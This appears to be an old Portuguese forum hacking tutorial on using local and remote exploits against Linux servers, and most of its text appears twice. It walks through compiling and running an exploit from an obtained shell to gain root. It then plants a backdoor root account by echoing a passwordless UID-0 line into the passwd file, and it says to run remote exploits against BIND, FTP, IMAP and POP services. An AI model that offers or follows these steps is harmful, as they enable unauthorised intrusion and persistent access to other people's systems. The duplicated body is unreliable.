Exploits locais são programas geralmente feitos em C que exploram a vulnerabilidade de programas e sistemas para ganhar acesso root ( de administrador ) , 90% dos exploits são para sistemas Linux , os exploits locais são scripts em C que você irá rodar no servidor a partir de uma shell adquirida , os exploits locais são os melhores de se usar , pela sua variedade e confiança de acesso ( desde que você saiba o que está fazendo ) , alguns possuem pequenos trojans para dar acesso ao seu programador .
Existem vários tipos de exploits locais , uma infinidade , cada um com sua função e seu jeito de executar . O que você vai fazer é basicamente o seguinte , você irá copiar o exploits para o provedor de sua shell e depois compilar ele , para copiar você usa um programa de FTP e para compilar você irá usar o telnet , ( use o Linux nessa operação toda ), após ter copiado o exploits para a shell vamos compilar ele :
Welcome to Linux 2.0.X
Host Login : geocities
Password:
Linux 2.0.X
Host :~$ gcc -o exploits exploits.c < === Compilando o Exploits.
Depois de compilado vamos rodá-lo para ganhar acesso root.
Host :~$ ./exploit <==Rodando o exploit no sistema.
Depois que você rodar o exploits vai aparecer uma série de lixos , que geralmente são os Buffers Owerflows no sistema , aí logo surgirá o prompt root :
Host :~# <===Aqui você ficou root no sistema , deu certo !
Agora você poderá acrescentar um usuário root para que não tenha que fazer toda essa merda de novo , você pode usar o add user e depois colocar os 0:0 de root no passwd ou fazer diretamente pelo comando echo , o que acho mais confiável .
Host :~# echo newroot::0:1:Novo Root:/:bin/bash <===colocando usuário no passwd .
Se o sistema tiver shadow você acrescenta devida linha no shadow também , depois é só se logar novamente e fazer a festa .
Welcome to Linux 2.0.X
Host Login : newroot
Password:
Linux 2.0.X
Host :~#
ExploitS RemotoS
SecuritY
Os Exploits Remotos como já diz o próprio nome , são parecidos com os Exploits Locais , mais , não precisam de uma shell para Hackear na maquina a qual se quer Hackear , precisa é de uma base para rodá-lo , podendo ser um Linux e nunca um Windows , pois o programa é em C ou Perl e o RWindows não permite tal tarefa ; os exploits remotos exploram Bugs remotamente dando ao Hacker acesso privilegiado no sistema . O que você vai fazer é pegar o exploit , compilar ele no seu Linux e depois rodá-lo com o host ao qual vai atacar . As vulnerabilidades mais comuns usadas são as de BIND , FTP , IMAPD e POP . Você poderá achar esses exploits na net!
Usando o exploits :
Host :# gcc -o exploit exploit.c <==Compilando o Exploit.
Host :# ./exploit
***************************
Exploit Remoto by Security Chaos
Use Exploit ./exploit host
***************************
Host :# ./exploit 127.0.0.1
Logo que na sua maioria ele der o buffer Owerflow remotamente no sistema ele te dará o prompt root e você poderá adicionar o seu user root.
[Eu não me responsabilizo por nada]
E um tuto antigo mais serve pra vc ter uma noção sobre exploit creditos acid burn
Existem vários tipos de exploits locais , uma infinidade , cada um com sua função e seu jeito de executar . O que você vai fazer é basicamente o seguinte , você irá copiar o exploits para o provedor de sua shell e depois compilar ele , para copiar você usa um programa de FTP e para compilar você irá usar o telnet , ( use o Linux nessa operação toda ), após ter copiado o exploits para a shell vamos compilar ele :
Welcome to Linux 2.0.X
Host Login : geocities
Password:
Linux 2.0.X
Host :~$ gcc -o exploits exploits.c < === Compilando o Exploits.
Depois de compilado vamos rodá-lo para ganhar acesso root.
Host :~$ ./exploit <==Rodando o exploit no sistema.
Depois que você rodar o exploits vai aparecer uma série de lixos , que geralmente são os Buffers Owerflows no sistema , aí logo surgirá o prompt root :
Host :~# <===Aqui você ficou root no sistema , deu certo !
Agora você poderá acrescentar um usuário root para que não tenha que fazer toda essa merda de novo , você pode usar o add user e depois colocar os 0:0 de root no passwd ou fazer diretamente pelo comando echo , o que acho mais confiável .
Host :~# echo newroot::0:1:Novo Root:/:bin/bash <===colocando usuário no passwd .
Se o sistema tiver shadow você acrescenta devida linha no shadow também , depois é só se logar novamente e fazer a festa .
Welcome to Linux 2.0.X
Host Login : newroot
Password:
Linux 2.0.X
Host :~#
ExploitS RemotoS
SecuritY
Os Exploits Remotos como já diz o próprio nome , são parecidos com os Exploits Locais , mais , não precisam de uma shell para Hackear na maquina a qual se quer Hackear , precisa é de uma base para rodá-lo , podendo ser um Linux e nunca um Windows , pois o programa é em C ou Perl e o RWindows não permite tal tarefa ; os exploits remotos exploram Bugs remotamente dando ao Hacker acesso privilegiado no sistema . O que você vai fazer é pegar o exploit , compilar ele no seu Linux e depois rodá-lo com o host ao qual vai atacar . As vulnerabilidades mais comuns usadas são as de BIND , FTP , IMAPD e POP . Você poderá achar esses exploits na net!
Usando o exploits :
Host :# gcc -o exploit exploit.c <==Compilando o Exploit.
Host :# ./exploit
***************************
Exploit Remoto by Security Chaos
Use Exploit ./exploit host
***************************
Host :# ./exploit 127.0.0.1
Logo que na sua maioria ele der o buffer Owerflow remotamente no sistema ele te dará o prompt root e você poderá adicionar o seu user root.
[Eu não me responsabilizo por nada]
E um tuto antigo mais serve pra vc ter uma noção sobre exploit creditos acid burn
Comment